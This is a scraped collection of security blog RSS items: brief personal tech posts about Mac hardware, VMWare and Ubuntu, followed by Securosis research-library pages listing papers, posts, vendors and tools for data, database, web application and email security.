http://securitysumo.wordpress.com/feed/ I upgraded the hard drive in my MacBook Pro today. It went pretty well, but is not really for the easily technological-intimidated! I followed (for the most part) the guide at ifixit. I ran into a few things that their guide didn’t include, so I thought I would add my experience here. First, as you [...]

==> MacBook and MacBook Pro USB Ports

http://securitysumo.wordpress.com/feed/ This week on MacBreak Weekly ( Episode 88 ) one of the hosts was having sound problems with a USB headset. They discussed the problem and one of the other hosts suggested changing the port the headset is on. A short discussion followed and here are the results. The MacBook has two USB ports on [...]

==> VMWare Fusion 2 Beta and Backtrack Wireless

http://securitysumo.wordpress.com/feed/ If you are trying to use VMWare Fusion 2.0 Beta and anything wireless in Backtrack, you might want to wait until the next release. I had all different kinds of trouble getting wireless USB dongles working with the setup. First Kismet would quit because of a TCP error. Then I had several kernel panics. Going [...]

==> What’s on my USB key?

http://securitysumo.wordpress.com/feed/ I’ve gathered many programs for my USB memory stick so I thought I would list them here. Actually, when you get down to it, I have a couple of memory sticks I keep with me most of the time. The first one is an older stick and is only 256 mb. However, it has a [...]

==> Ubuntu 8.04, VMWare Server, Wine and Warcraft, DVD Playback

http://securitysumo.wordpress.com/feed/ I installed the latest Ubuntu (8.04) last weekend and have been playing around with it a bit this week. Wow, is it nice! It is noticeably quicker than my 7.10 install. Of course, I did a complete wipe and reinstall, so that probably has something to do with the speed. I installed VMWare Server as [...]

==> Data Security

http://securosis.com/feeds/research If you really think about it, technically all of “information security” is “data security”, but the reality is that most of our industry is focused on protecting networks and hosts, and very little is dedicated to protecting the information assets themselves. We here at Securosis prefer the term “Information-Centric Security”, since information is data with value (as opposed to just a bunch of 0’s and 1’s), but we know “data security” is more commonly used, and we’re not about to fight the industry. Since data security encompasses a wide range of tools, technologies, and processes we will highlight top-level management issues on this page, and encourage you to explore the subtopics for more details on database security, DLP, encryption, and other specific areas. We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it’s added to help you find changes more easily. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on data security is the following: The Business Justification for Data Security. We recommend you download the white paper as it provides a condensed (and professionally edited) review, and here are the links to the individual blog posts to add additional color and commentary: Part 1, part 2, part 3, part 4, part 5, and part 6. (03/09). 2. Tokenization vs. Encryption: Options for compliance. This paper outlines the business uses for tokenization, and examines the tradeoffs between tokenization and traditional encryption. 3. Next, you should read our series of posts on the Data Security Lifecycle which shows how all the various bits and pieces plug in together. Keep in mind that some of these technologies aren’t completely available yet, but the series should give you a good overview of how to take a big picture approach to data security. Start with the Lifecycle, then read the details on the technologies, organized by phase: Part 1, Part 2, Part 3. 4. The general principles of Information-centric/Data Security. 5. Data Verification Issues. 6. Data And Application Security Will Drive Most Security Growth For The Next 3-5 Years. 7. Defensive Security Stack; showing where data security fits in with network, host, and application security (I mention CMF, which is the same as DLP): Data Protection - it’s More than A + B + C. 8. We believe that two existing technologies are evolving into the “core” of data security-Data Loss Prevention and Database Activity Monitoring. The are evolving into what we call Content Monitoring and Protection (DLP, for protecting productivity applications and communications), and Application and Database Monitoring and Protection (DAM, for protecting applications and the data center). We define both technologies in Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection. 9. Continuation of Content Monitoring and Protection: How Data Loss Prevention and Database Activity Monitoring Will Connect. 10. Data classification comes up all the time when discussing data security. Here’s an overview that starts to introduce the idea of practical data classification: The Five Problems With Data Classification, an Introduction To Practical Data Classification. We followed it with a post: Practical Data Classification: Type 1, The Hasty Classification. But the truth is, classification is usually quite problematic,and we don’t recommend manual classification to most enterprise users, as we wrote in: Data Classification is Dead. (We haven’t finished our data classification series yet). 11. Related to data classification, here is a post on Information Governance. 12. Before you start digging in too deep on data security, we recommend you prepare by understanding your users and infrastructure, as we wrote in: Information-Centric Security Tip: Know Your Users and Infrastructure. 13. File Activity Monitoring is an exciting new technology that finally gives us insight into not only how are files are used, but who the heck is accessing them, should be accessing them, and when they violate security policies. We can finally do things like generate alerts when a sales guy starts sucking down all the customer files before moving to a competitor. General Coverage ------------ 1. Sorry, Data Labeling is Not the Same as DRM/ERM 2. Data Labels Suck. 3. Security Requirements for Electronic Medical Records. 4. The Data Breach Triangle. 5. Data Harvesting and Privacy. Presentations --------- These PDF versions of presentations may also be useful, although they don’t include any audio (for any audio/video, please see the next section). * This is the Business Justification for Data Security Presentation that Rich and Adrian provided in February 2009. * This presentation is on Mobile Data Security for the Enterprise. * Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle. * Here’s the current version of Pragmatic Data Security which provides a good, practical process overview with specific implementation details. * Presentation on Data Protection in the Enterprise. Kind of a corporate overview. * Presentation on XML Security. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Since data security is such a broad issue, please see the sub-categories for vendors and tools. If much of this material seems somewhat generic, that’s because data /information-centric security is a fairly high-level topic. We really encourage you to learn about the specifics in the sub-categories in the navigation menu. Subscribe to our daily email digest

==> Upcoming Research

http://securosis.com/feeds/research The Securosis Research Agenda is a dynamic entity. We are constantly revisiting our research plans, so check back often to see what’s in the hopper: * Understanding and Selecting a Web Application Firewall * SIEM 2.0: Replacing Your SIEM Solution * Securing Applications at Scale * Masking for Compliance * Code Security: Security for Developers * Pragmatic Data Security * Network Security Fundamentals * Endpoint Security Fundamentals * Database Security 2.0: Database Security for Relational and Non-relational Systems * Understanding and Implementing Network Segregation * Data Security for the Cloud Some of these papers will be sponsored, some won’t, but all will be released for free under a Creative Commons license on our blog and within the Research Library. Subscribe to our daily email digest

==> All Research Papers

http://securosis.com/feeds/research Application Security Securing Big Data: Recommendations for Securing Hadoop and NoSQL Pragmatic WAF Management: Giving Web Apps a Fighting Chance Building a Web Application Security Program Cloud and Virtualization Compliance Tokenization Guidance Tokenization vs. Encryption: Options for Compliance Data Encryption 101: A Pragmatic Approach to PCI Data Security Understanding and Selecting a Key Management Solution Pragmatic Key Management for Data Encryption Understanding and Selecting Data Masking Solutions Implementing and Managing a Data Loss Prevention Solution Defending Data on iOS Understanding and Selecting a Database Security Platform Understanding and Selecting a File Activity Monitoring Solution Database Activity Monitoring: Software vs. Appliance The Securosis 2010 Data Security Survey Understanding and Selecting a Tokenization Solution Understanding and Selecting a DLP Solution Understanding and Selecting a Database Encryption or Tokenization Solution Low Hanging Fruit: Quick Wins with Data Loss Prevention (V2.0) Database Assessment Content Discovery Whitepaper Selecting a Database Activity Monitoring Solution Endpoint Security The Endpoint Security Management Buyer’s Guide Endpoint Security Fundamentals Best Practices for Endpoint DLP Evolving Endpoint Malware Detection: Dealing with Advanced and Targeted Attacks Network Security Network-based Threat Intelligence: Searching for the Smoking Gun Defending Against Denial of Service (DoS) Attacks Network-based Malware Detection: Filling the Gaps of AV Applied Network Security Analysis: Moving from Data to Information Fact-Based Network Security: Metrics and the Pursuit of Prioritization Network Security in the Age of Any Computing Understanding and Selecting an Enterprise Firewall Project Quant Malware Analysis Quant Measuring and Optimizing Database Security Operations (DBQuant) Network Security Ops Quant Metrics Model Network Security Operations Quant Report Project Quant Survey Results and Analysis Project Quant Metrics Model Report Security Management Building an Early Warning System Implementing and Managing Patch and Configuration Management Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform Watching the Watchers: Guarding the Keys to the Kingdom (Privileged User Management) Security Management 2.0: Time to Replace Your SIEM? Security Benchmarking: Going Beyond Metrics React Faster and Better: New Approaches for Advanced Incident Response Monitoring up the Stack: Adding Value to SIEM Understanding and Selecting SIEM/Log Management The Business Justification for Data Security Web and Email Security Email-based Threat Intelligence: To Catch a Phish Subscribe to our daily email digest

==> Vendor List

http://securosis.com/feeds/research Company Name Exhibitor Type Booth Number Sub-category Category Website 3M Mobile Interactive Solutions Division Exhibitor 2740 Mobile Security Endpoint Security http://solutions.3m.com/wps/portal/3M/en_US/Meetings/Home/ ActivIdentity Exhibitor 1128 Authentication Identity and Access Management http://www.actividentity.com/ Advanced Product Design Exhibitor 340 Advantech Exhibitor 217 AFC Industries Exhibitor 235 Furniture Other http://www.afcindustries.com/ Agiliance Exhibitor 2351 Compliance Security Management and Compliance http://www.agiliance.com/ Akamai Technologies Silver Sponsor 2017 Content Delivery http://www.akamai.com Alert Enterprise Exhibitor 351 Compliance Security Management and Compliance http://www.alertenterprise.com/ Alert Logic Exhibitor 2529 IDS/IPS Network Security http://www.alertlogic.com/ AlgoSec Exhibitor 856 Firewalls Network Security http://www.algosec.com/en/index.php AlienVault Exhibitor 652 SIEM/Log Management Security Management and Compliance http://www.alienvault.com/ Alta Associates Inc. Exhibitor 850 Compliance Security Management and Compliance http://www.altaassociates.com/ AMAX Information Technologies Exhibitor 346 http://www.amaxit.com/ American Portwell Technology, Inc. Exhibitor 628 http://www.portwell.com/ Anakam, an Equifax Company Exhibitor 226 Authentication Identity and Access Management http://www.anakam.com/ Anne Arundel Community College Exhibitor 2728 Education Other http://www.aacc.edu/ Anonymizer, Inc. Exhibitor 2722 Content Security Network Security http://www.anonymizer.com/ Antiy Labs Partner Pavilion 1541 Endpoint Security http://www.antiy.net/ Anue Systems Inc. Exhibitor 2445 Application Testing Application Security http://www.anuesystems.com/ APCON Exhibitor 832 http://www.apcon.com/ Application Security, Inc. Exhibitor 639 Database Security, Vulnerability Assessment Data Security, Security Management and Compliance http://www.appsecinc.com/ AppRiver Exhibitor 1059 Managed Services Email/Web Security http://www.appriver.com/ Approva Exhibitor 428 Compliance Security Management and Compliance http://www.approva.net/ Araknos SRL Unipersonale Exhibitor 347 SIEM/Log Management Security Management and Compliance http://www.araknos.it/en/azienda/azienda.html ArcSight Exhibitor 931 SIEM/Log Management Security Management and Compliance http://www.arcsight.com/ Armorize Technologies Inc. Exhibitor 329 Web Application Assessment Application Security http://www.armorize.com/ Art of Defence GmbH Partner Pavilion 1350 http://www.artofdefence.com/ Art of Defence GmbH Exhibitor 342 Web App Firewalls Application Security http://www.artofdefence.com/ Arxan Technologies Exhibitor 328 Secure Development Application Security http://www.arxan.com/ Astaro Exhibitor 2251 Firewalls, Email Security Gateway, Web Security Gateway Network Security, Email/Web Security http://www.astaro.com/ AT&T Exhibitor 831 http://www.att.com/ atsec information security Partner Pavilion 1350 Compliance Security Management and Compliance http://www.atsec.com/ Authentify, Inc. Exhibitor 1029 Authentication Identity and Access Management http://www.authentify.com/ Authernative, Inc. Exhibitor 550 Authentication Identity and Access Management http://www.authernative.com/ Avenda Systems Exhibitor 318 NAC Network Security http://www.avendasys.com/ Axway Silver Sponsor 2225 http://www.axway.com/ BeCrypt Inc. Exhibitor 2129 Disk Encryption Endpoint Security http://www.becrypt.com/ Beijing LinkTrust Technologies Development Co.,Ltd. Partner Pavilion 1541 Perimeter Defense Network Security http://www.linktrust.com.cn/ Beijing Topsec Science and Technology Co.,Ltd Partner Pavilion 1541 Beijing Venustech Inc. Partner Pavilion 1541 Perimeter Defense Network Security http://english.venustech.com.cn/ Beijing Zhongguancun Overseas Science Park Exhibitor 1541 http://www.zgc.gov.cn/english/ BeyondTrust Corp. Exhibitor 945 Anti-Malware Endpoint Security http://www.beyondtrust.com/ Bit9, Inc. Exhibitor 2621 Anti-Malware Endpoint Security http://www.bit9.com/ Bivio Networks Exhibitor 2133 Content Security Network Security http://www.bivio.net/ Black Box Network Services Exhibitor 2550 http://www.blackbox.com/ BlockMaster AB Exhibitor 2425 Mobile Security Endpoint Security http://www.blockmastersecurity.com/ Blue Coat Systems, Inc. Gold Sponsor 1139 Threat Mgmt, Anti-Malware, Web Security Gateway Network Security, Email/Web Security http://www.bluecoat.com/ BluePoint Security Exhibitor 2559 Cloud Security Virtualization and Cloud http://www.bluepointsecurity.com/ Brainloop Inc. Partner Pavilion 1350 Access Management Data Security http://www.brainloop.com/ BreakingPoint Systems, Inc. Exhibitor 951 Monitoring Network Security http://www.breakingpointsystems.com/ BroadWeb Corporation Partner Pavilion 1541 Perimeter Defense Network Security http://www.broadweb.com/ Bsafe Information Systems Inc. Exhibitor 855 Compliance Security Management and Compliance http://www.bsafesolutions.com/ BSI Partner Pavilion 1344 http://www.bsigroup.com/ C4ISR Journal Exhibitor 2650 Publication Other http://www.c4isrjournal.com CA Technologies Platinum Sponsor 1533 DLP, SIEM/Log Management, Compliance Data Security, Security Management and Compliance http://ca.com/ Capella University Exhibitor 251 Education Other http://www.capella.edu/ Cavium Networks Exhibitor 528 http://www.caviumnetworks.com/ Hardware CCSO.com Exhibitor 2619 http://www.ccso.com/ Disassembler Celestix Networks Exhibitor 852 Perimeter Defense Network Security http://www.celestix.com/ Cenzic, Inc. Exhibitor 332 Application Testing, Application Assessment Application Security http://www.cenzic.com/ Check Point Software Technologies Exhibitor 2317 Firewalls, IDS/IPS, Remote Access, Disk Encryption Network Security, Endpoint Security http://www.checkpoint.com/ Cherry Exhibitor 755 http://www.cherrycorp.com/ Hardware China quality certification certificate authority Partner Pavilion 1541 Compliance Security Management and Compliance http://www.cqc.com.cn/english/ CipherOptics Exhibitor 1923 Encryption Data Security http://www.cipheroptics.com/ Cisco Global Platinum Sponsor 1717 Firewalls, Remote Access, Threat Mgmt, Email Security Gateway, Web Security Gateway, Managed Services Network Security, Email/Web Security http://www.cisco.com/ Cloud Security Alliance Exhibitor 2718 http://www.cloudsecurityalliance.org/ Comodo Group, Inc. Exhibitor 2439 Endpoint Defense Endpoint Security http://www.comodo.com/ CoreTrace Corporation Exhibitor 1963 Anti-Malware Endpoint Security http://www.coretrace.com/ CORISECIO GmbH Partner Pavilion 1350 http://www.corisecio.com/ Coverity Exhibitor 333 Secure Development Application Security http://www.coverity.com/ Critical Watch Exhibitor 950 Compliance Security Management and Compliance http://www.criticalwatch.com/ Cryptography Research, Inc. Exhibitor 2233 http://www.cryptography.com/ Secure dev hardware cv cryptovision GmbH Partner Pavilion 1350 Encryption Data Security http://www.cryptovision.com/ Cyber-Ark Software, Inc. Exhibitor 2045 Authentication Identity and Access Management http://www.cyber-ark.com/ Cybera Exhibitor 752 Compliance Security Management and Compliance http://www.cybera.com/ Cyberoam Exhibitor 723 Perimeter Defense Network Security http://www.cyberoam.com/ Damballa Exhibitor 433 Endpoint Defense Endpoint Security http://www.damballa.com/ Dasient, Inc. Exhibitor 554 Endpoint Defense Endpoint Security http://www.dasient.com/ Dataguise Inc. Exhibitor 645 Database Security Data Security http://www.dataguise.com/ Department of Homeland Security/ US-CERT Exhibitor 457 http://www.us-cert.gov/ DeviceLock Exhibitor 2228 Mobile Security Subscribe to our daily email digest

==> Welcome to Securosis Research

http://securosis.com/feeds/research Download the Coverage Map (PDF) * About Our Research * About the Research Library About Our Research -------------- * Securosis is a new breed of IT research firm focusing on the broad information security and compliance markets. As opposed to relying on big sales forces and high pay walls, we publish our primary research for free on our blog. Yeah, we know, it’s different and scary. But it works. In terms of our primary research model, our focus is to help mid-market IT and security professionals successfully execute on their projects, by providing actionable information to accelerate their progress. It doesn’t mean our research isn’t relevant to large enterprises and government agencies. It just means our primary constituency is someone who wears a security hat as well as a number of other hats on a daily basis. Each week, Securosis publishes a ton of research on what’s happening in the security business, all focused on keeping our readers connected and focused on what’s important, not on the noise. Our weekly research includes: * Securosis FireStarter: Periodically Securosis holds an internal, no-holds-barred research meeting. Each analyst prepares a topic and the other analysts typically rip it to shreds. The end result is a thought generator that challenges our perspectives and demands further discussion. We publish the findings of that research to “stir the pot” a bit and get the echo chamber vibrating. * Securosis Incite: Something we’ve adopted from Security Incite is a hard-hitting summary of the news happening in our industry. Each Wednesday we send out 7-8 links with analysis of what’s happening out there and why it’s important. * Securosis Weekly Summary: Just in case you don’t have anything better to do over the weekend, on Friday we send out a list of things we’ve posted on the blog and also each analyst’s favorite outside post. This keeps you up to date on what we’ve been up to. * Ad Hoc Posts: Yes, the art of blogging is far from dead. During the week, once or twice a day we post something of interest. It could be a more detailed treatment of an announcement, something that’s been bothering us, or part of our primary research (which is always posted to the blog first). In case you are some kind of dinosaur and don’t use an RSS reader, you can sign up for email distribution of our blog posts. Sign up for the Daily Digest or the Weekly Summary.
For each of our coverage areas, we have a defined hierarchy of primary research documents we prepare to ensure deep coverage and actionable advice: * Understanding and Selecting: This series of posts provides the backdrop for each security domain. The research takes a product category perspective and helps readers understand why and how they’d use certain technology, and what is important when evaluating products and offerings. As an example, check out our work on Understanding and Selecting a Database Activity Monitoring Solution. * Building a [Topic] Program: The next level in our research is how to structure a security program to solve a specific problem. This is about more than just figuring out what product to buy, but the underlying processes and techniques required to address a specific problem. You can see our Building a Web Application Security Program for an example of this research. * Project Quant: For a select few coverage areas, we go very deep and actually define very granular process maps and establish metrics to quantify those processes for an aspect of security. We do a public survey to make sure we nail the process map and publish the survey results when we get a statistically significant sample. Check out Project Quant for Patch Management to understand this research.
About the Research Library
Are you tired of having to hunt through screen after screen of crappy search results just to find the few bits of information you need? Or trawl through endless forums and unrelated blog entries just to educate yourself on a new topic? We are too… that’s why we created the Securosis Research Library. The Library is designed to be your first stop when researching a new topic. We’ve collected our best blog posts, white papers, and multimedia materials together in a structure designed to help you find what you need as quickly as possible. Unlike search results or a wiki, we’ve organized the material for each topic in the order we think it will be most useful, rather than by date or some other arbitrary sorting method. We don’t cover every security topic you could think of, but we’re constantly expanding into new areas and filling in coverage that’s lighter than we’d like. Where possible, for technology-related topics we include a list of Free/Open Source and commercial products. We try to keep these lists updated, but if you see something we are missing please email us so we can add it. This is just a list of what’s available in alphabetical order – we aren’t endorsing any particular products. We update the material in the Library on an ongoing basis, and each entry is dated with the last update. If you’d like to keep your own copy, just subscribe to the RSS feed. Since we update the date on each entry when we make changes, your RSS reader should keep a current, local copy of the entire library. Pretty cool, eh? We hope you find it useful, and please email us with any suggestions, errors, or omissions. Subscribe to our daily email digest

==> Endpoint Security

http://securosis.com/feeds/research Stand by for our endpoint security page. Subscribe to our daily email digest

==> Security Management

http://securosis.com/feeds/research Stand by for our security management page. Subscribe to our daily email digest

==> Network Security

http://securosis.com/feeds/research Stand by for our network security page. Subscribe to our daily email digest

==> Cloud and Virtualization

http://securosis.com/feeds/research This is one of the newest areas of our coverage, and although cloud computing and virtualization are distinct technologies, they are very closely related. Subscribe to our daily email digest

==> Compliance

http://securosis.com/feeds/research Papers and Posts ------------ This section covers compliance topics and several general security issues related to compliance with industry and governmental regulations. This is a new section for us, and while we have a ton of information on this topic, we will be evolving how we present the material over time. These articles are strategic in nature, but we will be adding videos and podcasts for hands-on guidance in the coming weeks. General Coverage ------------ 1. It Isn’t Risk Management If You Can’t Lose 2. Visa’s Data Field Encryption 3. Tokenization Will Become the Dominant Payment Transaction Architecture 4. Some Follow-Up Questions for Bob Russo, General Manager of the PCI Council 5. We Know How Breaches Happen 6. New Details, and Lessons, on Heartland Breach 7. Heartland Hackers Caught; Answers and Questions 8. An Open Letter to Robert Carr, CEO of Heartland Payment Systems Presentations --------- * Presentation on Tokenization Guidance for PCI. * Presentation on Data Breaches and Encryption. * Presentation on Data Protection in the Enterprise. This is a corporate overview. * Presentation on Encrypting Mobile Data for the Enterprise. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Please email info@securosis.com if you have any additions or corrections. Subscribe to our daily email digest

==> Database Security

http://securosis.com/feeds/research Database Security is one of the broader topics that Securosis covers. Database servers are highly complex systems – storing, organizing, and managing data for a wide array of applications. Most mid-sized firms have dozens of them, some embedded in desktop applications, while others serve core systems such as web commerce, financials, manufacturing, and inventory management. A Fortune 100 company may have thousands. To address the wide range of offerings and uses, we will cover database security from two different angles. The first is the security of the application itself, and the second is the use and security of the data within the database. Database Vulnerability Assessment (VA), access control & user management, and patch management are all areas where preventative security measures can be applied to a database system. For securing the data itself, we include such topics as Database Activity Monitoring (DAM), auditing, data obfuscation/masking, and database encryption. Technologies like database auditing can be used for either, but we include them in the later category because they provide a transactional view of database usage. We also include some of the database programming guidelines that can help protect databases from SQL injection and other attacks against application logic. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and comments). 1. Understanding and Selecting a Database Security Platform is our new comprehensive database security paper. 2. Database Activity Monitoring research paper remains a reader favorite and can be downloaded here: “Understanding and Selecting a Database Activity Monitoring Solution” white paper. 3. Understanding and Selecting a Database Assessment Solution is now available. We are very happy with this paper. We have even been told by database assessment vendors their product teams learned some tips from this paper, and we think you will too. 4. Our Understanding and Selecting a Database Encryption or Tokenization Solution paper is available. 5. Database Audit Events is a comprehensive list of database events available through native database auditing techniques. 6. Many supporting posts on Database Encryption: Application vs. Database Encryption and Database Encryption: Fact vs. Fiction, Format and Datatype Preserving Encryption, An Introduction to Database Encryption, Database Encryption Misconceptions, Media encryption options for databases,and threat vectors to consider when encrypting data. 7. The 5 laws of Data Masking. Database Security Patch Coverage
1. Oracle Critical Patch Update, July 2009. General Coverage ------------ 1. SQL Injection Prevention 2. Database Audit Performance in this Friday Summary introduction 3. Database Encryption Benchmarking 4. Three Database Roles: Programmer, DBA, Architect 5. Database Security: The Other First Steps 6. Sentrigo and MS SQL Server Vulnerability. 7. Amazon’s SimpleDB. 8. Information on Weak Database Password Checkers. 9. Database Connections and Trust, and databases are not typically set up to validate incoming connections against SQL injection and misused credentials, and this post on recommending Stored Procedures to address SQL Injection attacks 10. Separation of Duties and Functions through roles and programmatic elements, and putting some of the web application code back into the database. 11. Native database primary key generation to avoid data leakage and inference problems, and additional comments on Inference Attacks. 12. Your Top 5 Database Security Resolutions. 13. Posts on separation of duties: Who “Owns” Database Security, and the follow-up: DBAs should NOT own DAM & Database Security. 14. A look at general threats around using External Database Procedures and variants in relational databases. 15. Database Audit Events. 16. Database Security Mass-Market Update and Friday Summary - May 29, 2009 17. Database Patches, Ad Nauseum 18. Acquisitions and Strategy 19. Comments on Oracle’s Acquisition of Sun 20. Oracle CPU for April 2009 21. Netezza buys Tizor 22. More Configuration and Assessment Options. Discusses recent Oracle and Tenable advancements. 23. Policies and Security Products applies to database security as well as other product lines. 24. Oracle Security Update for January 2009. 25. Responding to the SQL Server Zero Day: Security Advisory 961040 includes some recommendations and workarounds. 26. Will Database Security Vendors Disappear? and Rich’s follow-on Database Security Market Challenges considerations for this market segment. 27. Behavioral Monitoring for database security. 28. NitroSecurity acquired RippleTech. 29. Database Monitoring is as big or bigger than DLP. Presentations --------- * Rich’s presentation on Understanding and Selecting a Database Activity Monitoring Solution. (PDF) * Oracle database Security in a Down Economy. (PDF) Podcasts, Webcasts and Multimedia
None at this time Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Database Security Platforms * Application Security Inc. (DBProtect) * Fortinet. * GreenSQL. * IBM (Guardium). * Imperva (SecureSphere) * McAfee (Sentrigo) (Nitro). * Oracle (Secerno). Database Vulnerability Assessment * Application Security Inc.. (AppDetective, DBProtect) * Fortinet. (IPLocks). * IBM (Guardium). * Imperva. (DAS, Scuba) * McAfee. (Sentrigo) * Oracle. (mValent, Config. Packs) * Qualys. * Tenable Network Security. (Nessus) * Next Generation Security Software NGS. (Squirrel) Database Encryption * NetLib. * Oracle. (TDE, API) * Protegrity. * Prime Factors. * Relational Wizards. * RSA. (Valyd) * SafeNet. (Ingrian) * Sybase. * Thales. (aka nCipher) * Trustwave. (Vericept) * Voltage. Note that some of the vendors listed provide transparent disk encryption or application layer encryption that can be applied to database files or content. Database Auditing * GreenSQL * Oracle (Audit Vault). * SoftTree Technologies. (DB Audit Expert) * Quest. (InTrust for DB) Note that all DAM vendors provide auditing to one degree or another. This section is to designate specific products that provide database auditing, are not part of a DAM solution, and are not built into a database platform as a standard component. Database Masking * Axis Technology. * Camouflage. * dataguise. * Embarcadero. * Grid-Tools. * GreenSQL. * Hexaware/Akiva. * IBM. (Optim/Princeton Softech) * Informatica. (ETL + Applimation) * MENTiS Software. * Voltage. (ETL + Dynamic) Note that there are several vendors who offer format preserving encryption and tokenization, such as NuBridges, Prime Factors, Protegrity and Voltage, which also provides some masking capabilities. Database Vendors * IBM. * Oracle. (Oracle, MySQL) * Sybase. * Teradata. * Apache. (Derby) * PostgreSQL. (Postgres) * Ingres. (Open Ingres) There are dozens of vendors, both big and small, who offer databases – many with specific competitive advantages. We aren’t even attempting to comprehensive, and specifically ignored any without widespread mainstream adoption. There are also dozens more open source databases with small numbers of deployments, perhaps primarily embedded in applications or backending non-commercial web applications. Subscribe to our daily email digest

==> Web Application Security

http://securosis.com/feeds/research Here we focus on security specifically for web applications, as opposed to traditional corporate or enterprise applications. Our research pages on general application security should be used in tandem with this one, but this section focuses on the unique issues of web application security. By our definition, Web Application Security is a super-set of traditional application security. Why? Because more often than not, web applications are backed by enterprise applications. They have all of the same problems, along with a handful of new security issues that are specific to offering distributed programs and functions across the Internet. For example web applications offer features and functions to users outside the corporate network, so they cannot make any assumptions about the security of the network transmission nor the intentions of the user. They run on top of a complex conglomeration of services, consist primarily of custom code, produce dynamic content, and provide their UI entirely through a browser. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on Web Application Security is Building a Web Application Security Program. For those of you who followed along with the blog series, this is a compilation of that content, but it’s been updated to reflect all the comments we received, with additional research, and the entire report was professionally edited. The original blog series can be found here (Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7, and Part 8. As well as a couple points we forgot to mention. 2. Rich’s post on How the Cloud Destroys Everything that I Love (About Web App Security). 3. The Risks of Trusting Content. 4. Web Application Security: We Need Web Application Firewalls to Work. Better. General Coverage ------------ 1. XML Security Overview 2. It’s Thursday the 13th—Update Adobe Flash Day 3. Heartland Hackers Caught; Answers and Questions 4. Using a Mac? Turn Off Java in Your BrowserWere All Gonna Get Hacked is about the browser, not the app, but we’ll cross reference here. 5. There Are No Trusted Sites: Security Edition 6. Click-jacking Details, Analysis, and Advice. 7. Comments on “Containing Conficker”, a brief analysis of the Honeynet Project’s Know Your Enemy paper, an examination of how the Conficker worm attacks and behaves in general. 8. WAF vs. Secure Code vs. Dead Fish. 9. Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development. Presentations --------- * Our presentation on Building A Web Application Security Program. This was presented as supplementary material to the white paper of the same name. * Presentation on Integrating Penetration Testing Into a Web Application Vulnerability Assessment Program. (PDF) Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Remember that web application security is over and above the standard application security practices and technology, and these should be considered alongside other tools. We strongly encourage you to learn about the specifics of subcategories in the navigation menu. Web Application Assessment * Cenzic * HP * Secure Works * WhiteHat Security Penetration Testing * AppLabs * Bonsai * CGISecurity * Core Security Technologies * McAfee (Foundstone) * Plynt * Rvasi * WindowSecurity.com Static Source Code Review * Aspect Security * Cigital * Fortify * IBM * Ounce * Veracode Dynamic Source Code Review * Coverity * Ounce * Veracode Web Application Firewalls * armorlogic. * ArtofDefense Hyperguard * Barracuda Networks. * Breach. * Cisco. * F5. * Fortify. * Fortinet * Imperva. * Protegrity. Monitoring (All WAF vendors can monitor as well.) Education & Training * SANS Institute * SAIC Most regional ISSA and ISACA chapters can provide assistance as well. Subscribe to our daily email digest

==> Web, Email, and Data Portal Security

http://securosis.com/feeds/research This research page covers web filtering as well as email security and anti-spam options. The email security market, like the web gateway market, is one of the most saturated and commoditized in the security industry. As with firewalls and anti-virus (on Windows), it is essentially impossible to do business without these tools. And to no one’s surprise we see continued convergence of these threat protection products; in some cases, it’s merely mergers and acquisitions to provide two separate products from the same vendor, but in other cases we see combined solutions – often in an attempt to displace point products. As many of the site-managed solutions also offer gateway and secure data exchange services, we will cover that here as well. The intended audience for this page is those interested in security products for their business, to keep their users’ inboxes free of spam, and ensure Internet browsing stays within company policy. In the past we would just have said ‘bleep’, as that is why many of these platforms are purchased. In reality there are many other security and compliance uses for these technologies, which are as least as important. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. Barracuda Networks Acquires Purewire 2. McAfee Acquires MX Logic 3. The Symantec acquisition of MessageLabs demonstrates that the battle for this fully commoditized market is not over. 4. Marshal8e6 Buys Avinti, and how the smaller vendors need to innovate and re-position their technologies to compete. General Coverage ------------ 1. The First Phishing Email I Almost Fell For 2. I Heart Creative Spam 3. Spam Levels and Anti-Spam SaaS. 4. Hackers 1, Marketing 0. Presentations --------- PDF versions of presentations (when available) may also be useful, although they don’t include any audio (for any audio/video, please see the next section). Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email if you have any additions or corrections. Vendors * Aladdin * Astaro * Axway (Tumbleweed) * Barracuda Networks * Cisco (Ironport) * Clearswift (MIMESweeper) * Cloudmark * CommTouch * Google (Postini) * Marshal8e6 (Mail Marshal + 8e6 Technologies) * McAfee (IronMail, WebWasher, Secure Computing, CipherTrust) * Proofpoint * SonicWall (MailFrontier) * Symantec (BrightMail and MessageLabs) * WebSense Subscribe to our daily email digest

==> Research: Data Loss Prevention

